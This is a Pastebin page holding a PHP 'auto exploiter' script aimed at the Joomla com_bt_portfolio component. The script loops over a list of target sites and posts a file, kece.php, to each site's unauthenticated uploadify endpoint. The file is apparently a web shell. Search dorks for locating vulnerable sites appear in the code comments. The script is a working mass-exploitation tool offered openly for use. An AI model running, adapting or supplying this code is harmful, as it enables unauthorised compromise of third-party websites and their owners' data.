Advertisement
ken7

Eksploit Com Bt Portfolio

Apr 29th, 2015
565
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.90 KB | None | 0 0
  1. <?php
  2.  
  3. #Joomla Com_bt_portfolio Auto Exploiter
  4. #Edited By : kendri
  5.  
  6. #Visit My Blog : http://ken7ester.blogspot.com/
  7.  
  8. #Greets: USTADCAGE_48 - Alsaskar_Attacker - Dan orang orang yang menganggap saya Teman
  9. #
  10.                  
  11. #Dork :          Use Your Brain
  12. #                inurl:/bt_portfolio
  13. #                inurl:/bt_foto
  14. #                inurl:/index.php?option=com_bt_portfolio
  15.  
  16. $get=file_get_contents($argv[1]);
  17. $j=explode("\r\n",$get);
  18. foreach($j as $site){
  19. echo "\n\n\t[+] Uploading file to : ".$site;
  20.  
  21. $uploadfile="kece.php";
  22. $ch =curl_init("$site/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
  23. curl_setopt($ch, CURLOPT_POST, true);
  24. curl_setopt($ch, CURLOPT_POSTFIELDS,
  25. array('Filedata'=>"@$uploadfile",'folder'=>"/"));
  26. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  27. $postResult = curl_exec($ch);
  28. curl_close($ch);{
  29. print "\n\n\n$postResult";
  30. echo "\n\n\t";
  31. }
  32. }
  33. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement